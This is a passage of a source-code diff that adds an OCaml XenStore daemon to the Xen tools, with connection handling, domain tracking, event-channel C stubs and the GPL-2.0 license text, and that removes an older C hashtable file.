+object (self) + val m_header = new buffer Message.header_size + val mutable m_payload = new buffer 0 + method allocate_payload length = m_payload <- new buffer length + method clear = + self#header#clear; + self#allocate_payload 0 + method header = m_header + method in_header = self#header#remaining <> 0 + method in_payload = self#payload#remaining <> 0 + method message = + if self#in_header + then Message.null_message + else ( + let header = Message.deserialise_header self#header#buffer in + let payload = if self#payload#length = 0 then String.make header.Message.length Constants.null_char else self#payload#buffer in + Message.make header.Message.message_type header.Message.transaction_id header.Message.request_id payload + ) + method payload = m_payload +end + +class connection (interface : Interface.interface) = +object (self) + val m_input_buffer = new buffered_message + val m_interface = interface + method private interface = m_interface + method private input_buffer = m_input_buffer + method private read_buffer buffer = + let read_buffer = String.make buffer#remaining Constants.null_char in + let bytes = self#interface#read read_buffer 0 (String.length read_buffer) in + if bytes < 0 + then raise (Constants.Xs_error (Constants.EIO, "Connection.connection#read_buffer", "Error reading from interface")) + else (buffer#write (String.sub read_buffer 0 bytes); buffer#remaining = 0) + method private write_buffer buffer offset = + let length = String.length buffer in + let bytes_written = self#interface#write buffer offset (length - offset) in + if offset + bytes_written < length then self#write_buffer buffer (offset + bytes_written) + method can_read = self#interface#can_read + method can_write = self#interface#can_write + method destroy = self#interface#destroy + method read = + let input = self#input_buffer in + if input#in_header && self#read_buffer input#header + then ( + let length = input#message.Message.header.Message.length in + if length > Constants.payload_max + then raise (Constants.Xs_error (Constants.EIO, "Connection.connection#read", "Payload too big")) + else input#allocate_payload length + ); + if (not input#in_header && not input#in_payload) || (input#in_payload && self#read_buffer input#payload) + then ( + let message = input#message in + input#clear; + Some (message) + ) + else None + method write message = self#write_buffer ((Message.serialise_header message.Message.header) ^ message.Message.payload) 0 +end diff -r 10a8fae412c5 tools/xenstore/constants.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/constants.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,82 @@ +(* + Constants for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let path_max = 4096 +let absolute_path_max = 3072 +let relative_path_max = 2048 +let payload_max = 4096 + +(* domain_id_self is used in certain contexts to refer to oneself *) +let domain_id_self = 0x7FF0 + +(* The prefix character that indicates a watch event *) +let event_char = '@' + +let null_char = char_of_int 0 +let null_string = String.make 0 null_char +let null_file_descr = - 1 + +let payload_false = "F" +let payload_true = "T" + +let virq_dom_exc = 3 + +(* Error type *) +type error = + | EINVAL + | EACCES + | EEXIST + | EISDIR + | ENOENT + | ENOMEM + | ENOSPC + | EIO + | ENOTEMPTY + | ENOSYS + | EROFS + | EBUSY + | EAGAIN + | EISCONN + (* XXX: Hack to fix violation of errors specified in protocol *) + | E2BIG + | EPERM + +(* Return the string representation of an error *) +let error_message error = + match error with + | EINVAL -> "EINVAL" + | EACCES -> "EACCES" + | EEXIST -> "EEXIST" + | EISDIR -> "EISDIR" + | ENOENT -> "ENOENT" + | ENOMEM -> "ENOMEM" + | ENOSPC -> "ENOSPC" + | EIO -> "EIO" + | ENOTEMPTY -> "ENOTEMPTY" + | ENOSYS -> "ENOSYS" + | EROFS -> "EROFS" + | EBUSY -> "EBUSY" + | EAGAIN -> "EAGAIN" + | EISCONN -> "EISCONN" + (* XXX: Hack to fix violation of errors specified in protocol *) + | E2BIG -> "E2BIG" + | EPERM -> "EPERM" + +(* Error exception *) +exception Xs_error of error * string * string diff -r 10a8fae412c5 tools/xenstore/domain.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/domain.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,105 @@ +(* + Domains for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let xc_handle = Eventchan.xc_interface_open () + +class domain (id : int) (connection : Connection.connection) = +object (self) + val m_id = id + val m_connection = connection + val mutable m_input_list = [] + val mutable m_output_list = [] + val mutable m_dying = false + val mutable m_shutdown = false + method private connection = m_connection + method private input_list = m_input_list + method private output_list = m_output_list + method add_input_message message = m_input_list <- m_input_list @ [ message ] + method add_output_message message = m_output_list <- m_output_list @ [ message ] + method can_read = self#connection#can_read + method can_write = self#has_output_message && self#connection#can_write + method destroy = self#connection#destroy + method dying = m_dying <- true + method has_input_message = List.length self#input_list > 0 + method has_output_message = List.length self#output_list > 0 + method id = m_id + method input_message = + let message = List.hd self#input_list in + m_input_list <- List.tl m_input_list; + message + method input_messages = self#input_list + method is_dying = m_dying + method is_shutdown = m_shutdown + method output_message = + let message = List.hd self#output_list in + m_output_list <- List.tl m_output_list; + message + method output_messages = self#output_list + method read = match self#connection#read with Some (message) -> self#add_input_message message | None -> () + method shutdown = m_shutdown <- true + method write = self#connection#write self#output_message +end + +class domains = +object (self) + val m_dominfo = Dominfo.init () + val m_entries = Hashtbl.create 8 + val mutable m_domains : domain list = [] + method private check domain = + if Dominfo.info self#dominfo xc_handle domain#id = 1 && Dominfo.domid self#dominfo = domain#id + then ( + if (Dominfo.crashed self#dominfo || Dominfo.shutdown self#dominfo) && not domain#is_shutdown then domain#shutdown; + if Dominfo.dying self#dominfo then domain#dying + ); + domain#is_dying || domain#is_shutdown + method private dominfo = m_dominfo + method private entries = m_entries + method add domain = + m_domains <- domain :: m_domains; + Hashtbl.add self#entries domain#id 0 + method cleanup = List.fold_left (fun domains domain -> if self#check domain then domain :: domains else domains) [] self#domains + method domains = m_domains + method entry_count domain_id = Hashtbl.find self#entries domain_id + method entry_decr domain_id = + let entries = try pred (Hashtbl.find self#entries domain_id) with Not_found -> 0 in + Hashtbl.replace self#entries domain_id (if entries < 0 then 0 else entries) + method entry_incr domain_id = Hashtbl.replace self#entries domain_id (try succ (Hashtbl.find self#entries domain_id) with Not_found -> 1) + method find_by_id domain_id = List.find (fun domain -> domain#id = domain_id) self#domains + method remove (domain : domain) = + m_domains <- List.filter (fun dom -> domain#id <> dom#id) self#domains; + Hashtbl.remove self#entries domain#id; + domain#destroy + method timeout = if List.exists (fun domain -> domain#can_read || domain#can_write) self#domains then 0.0 else - 1.0 +end + +(* Initialise an unprivileged domain *) +let domu_init id remote_port mfn notify = + let port = Eventchan.bind_interdomain id remote_port in + let interface = new Xenbus.xenbus_interface port (Xenbus.map_foreign xc_handle id mfn) in + let connection = new Connection.connection interface in + if notify then Eventchan.notify port; + new domain id connection + +(* Check if a domain is unprivileged based on its ID *) +let is_unprivileged_id domain_id = + domain_id > 0 + +(* Check if a domain is unprivileged *) +let is_unprivileged domain = + is_unprivileged_id domain#id diff -r 10a8fae412c5 tools/xenstore/dominfo.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/dominfo.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,47 @@ +(* + Domain info for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type t;; + +external get_crashed32 : t -> int32 = "get_crashed_c";; +external get_domid32 : t -> int32 = "get_domid_c";; +external get_dying32 : t -> int32 = "get_dying_c";; +external get_shutdown32 : t -> int32 = "get_shutdown_c";; +external init : unit -> t = "init_dominfo_c";; +external xc_domain_getinfo : int -> int -> int -> t -> int = "xc_domain_getinfo_c";; + +(* Return crashed state *) +let crashed dominfo = + get_crashed32 dominfo <> 0l + +(* Return domain ID *) +let domid dominfo = + Int32.to_int (get_domid32 dominfo) + +(* Return dying state *) +let dying dominfo = + get_dying32 dominfo <> 0l + +(* Return domain info *) +let info dominfo xc_handle id = + xc_domain_getinfo xc_handle id 1 dominfo + +(* Return shutdown state *) +let shutdown dominfo = + get_shutdown32 dominfo <> 0l diff -r 10a8fae412c5 tools/xenstore/dominfo_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/dominfo_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,93 @@ +/* + Domain info C stubs for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include + +#include +#include + +#include +#include +#include +#include + +/* Initialise a domain's info */ +value init_dominfo_c (value dummy_v) +{ + CAMLparam1 (dummy_v); + + value dominfo_v = alloc (Abstract_tag, 1); + Field (dominfo_v, 0) = (value) malloc (sizeof(xc_dominfo_t)); + + CAMLreturn (dominfo_v); +} + +/* Return a domain's info */ +value xc_domain_getinfo_c (value fd_v, value domid_v, value max_doms_v, value dominfo_v) +{ + CAMLparam4 (fd_v, domid_v, max_doms_v, dominfo_v); + + int fd = Int_val (fd_v); + uint32_t domid = (uint32_t)(Int_val (domid_v)); + unsigned int max_doms = Int_val (max_doms_v); + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (Val_int (xc_domain_getinfo(fd, domid, max_doms, dominfo))); +} + +/* Return a domain's crashed state */ +value get_crashed_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->crashed)); +} + +/* Return a domain's ID */ +value get_domid_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->domid)); +} + +/* Return a domain's dying state */ +value get_dying_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->dying)); +} + +/* Return a domain's shutdown state */ +value get_shutdown_c (value dominfo_v) +{ + CAMLparam1 (dominfo_v); + + xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0)); + + CAMLreturn (caml_copy_int32(dominfo->shutdown)); +} diff -r 10a8fae412c5 tools/xenstore/eventchan.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/eventchan.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,68 @@ +(* + Event channel for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +external fake_call : unit -> int = "xc_interface_open" +external xc_event_chan_bind_interdomain : int -> int -> int -> int = "xc_evtchn_bind_interdomain_c" +external xc_event_chan_bind_virq : int -> int -> int = "xc_evtchn_bind_virq_c" +external xc_event_chan_fd : int -> int = "xc_evtchn_fd_c" +external xc_event_chan_open : unit -> int = "xc_evtchn_open_c" +external xc_event_chan_notify : int -> int -> int = "xc_evtchn_notify_c" +external xc_event_chan_pending : int -> int = "xc_evtchn_pending_c" +external xc_event_chan_unbind : int -> int -> int = "xc_evtchn_unbind_c" +external xc_event_chan_unmask : int -> int -> int = "xc_evtchn_unmask_c" +external xc_interface_open : unit -> int = "xc_interface_open_c" +external xc_interface_close : int -> int = "xc_interface_close_c" + +(* XXX: Force libxenctrl to be compiled in. There must be a better way *) +let fake () = + fake_call () + +let xce_handle = ref (- 1) + +(* Bind a domain to the remove end *) +let bind_interdomain id remote_port = + xc_event_chan_bind_interdomain !xce_handle id remote_port + +(* Bind the virq *) +let bind_virq virq = + xc_event_chan_bind_virq !xce_handle virq + +(* Return the event channel fd *) +let get_channel () = + xc_event_chan_fd !xce_handle + +(* Intialise the event channel *) +let init () = + xce_handle := xc_event_chan_open () + +(* Notify XenBus *) +let notify port = + ignore (xc_event_chan_notify !xce_handle port) + +(* Check for pending event *) +let pending () = + xc_event_chan_pending !xce_handle + +(* Unbind a XenBus port *) +let unbind port = + xc_event_chan_unbind !xce_handle port <> - 1 + +(* Unmask a XenBus port *) +let unmask port = + xc_event_chan_unmask !xce_handle port diff -r 10a8fae412c5 tools/xenstore/eventchan_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/eventchan_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,124 @@ +/* + Event channel C stubs for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include +#include + +#include +#include +#include + + +/* Bind an interdomain event channel */ +value xc_evtchn_bind_interdomain_c (value xce_handle_v, value domid_v, value remote_port_v) +{ + CAMLparam3 (xce_handle_v, domid_v, remote_port_v); + + int xce_handle = Int_val (xce_handle_v); + int domid = Int_val (domid_v); + uint32_t remote_port = (uint32_t)(Int_val (remote_port_v)); + + CAMLreturn (Val_int (xc_evtchn_bind_interdomain (xce_handle, domid, remote_port))); +} + +/* Bind the VIRQ event channel */ +value xc_evtchn_bind_virq_c (value xce_handle_v, value virq_v) +{ + CAMLparam2 (xce_handle_v, virq_v); + + int xce_handle = Int_val (xce_handle_v); + unsigned int virq = Int_val (virq_v); + + CAMLreturn (Val_int (xc_evtchn_bind_virq (xce_handle, virq))); +} + +/* Return the event channel file descriptor */ +value xc_evtchn_fd_c (value xce_handle_v) +{ + CAMLparam1 (xce_handle_v); + + int xce_handle = Int_val (xce_handle_v); + + CAMLreturn (Val_int (xc_evtchn_fd (xce_handle))); +} + +/* Notify an event channel of an event */ +value xc_evtchn_notify_c (value xce_handle_v, value port_v) +{ + CAMLparam2 (xce_handle_v, port_v); + + int xce_handle = Int_val (xce_handle_v); + uint32_t port = (uint32_t)(Int_val (port_v)); + + CAMLreturn (Val_int (xc_evtchn_notify (xce_handle, port))); +} + +/* Open the event channel */ +value xc_evtchn_open_c (value dummy_v) +{ + CAMLparam1 (dummy_v); + CAMLreturn (Val_int (xc_evtchn_open ())); +} + +/* Check an event channel for pending events */ +value xc_evtchn_pending_c (value xce_handle_v) +{ + CAMLparam1 (xce_handle_v); + + int xce_handle = Int_val (xce_handle_v); + + CAMLreturn (Val_int (xc_evtchn_pending (xce_handle))); +} + +/* Unbind an event channel */ +value xc_evtchn_unbind_c (value xce_handle_v, value port_v) +{ + CAMLparam2 (xce_handle_v, port_v); + + int xce_handle = Int_val (xce_handle_v); + uint32_t port = (uint32_t)(Int_val (port_v)); + + CAMLreturn (Val_int (xc_evtchn_unbind (xce_handle, port))); +} + +/* Unmask an event channel */ +value xc_evtchn_unmask_c (value xce_handle_v, value port_v) +{ + CAMLparam2 (xce_handle_v, port_v); + + int xce_handle = Int_val (xce_handle_v); + uint32_t port = (uint32_t)(Int_val (port_v)); + + CAMLreturn (Val_int (xc_evtchn_unmask (xce_handle, port))); +} + +/* Close the XenBus interface */ +value xc_interface_close_c (value xc_handle_v) +{ + CAMLparam1 (xc_handle_v); + CAMLreturn (Val_int (xc_interface_close (Int_val (xc_handle_v)))); +} + +/* Open the XenBus interface */ +value xc_interface_open_c (value dummy_v) +{ + CAMLparam1 (dummy_v); + CAMLreturn (Val_int (xc_interface_open ())); +} diff -r 10a8fae412c5 tools/xenstore/gpl-2.0.txt --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/gpl-2.0.txt Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff -r 10a8fae412c5 tools/xenstore/hashtable.c --- a/tools/xenstore/hashtable.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,285 +0,0 @@ -/* Copyright (C) 2004 Christopher Clark */ - -#include "hashtable.h" -#include "hashtable_private.h" -#include -#include -#include -#include -#include - -/* -Credit for primes table: Aaron Krowne - http://br.endernet.org/~akrowne/ - http://planetmath.org/encyclopedia/GoodHashTablePrimes.html -*/ -static const unsigned int primes[] = { -53, 97, 193, 389, -769, 1543, 3079, 6151, -12289, 24593, 49157, 98317, -196613, 393241, 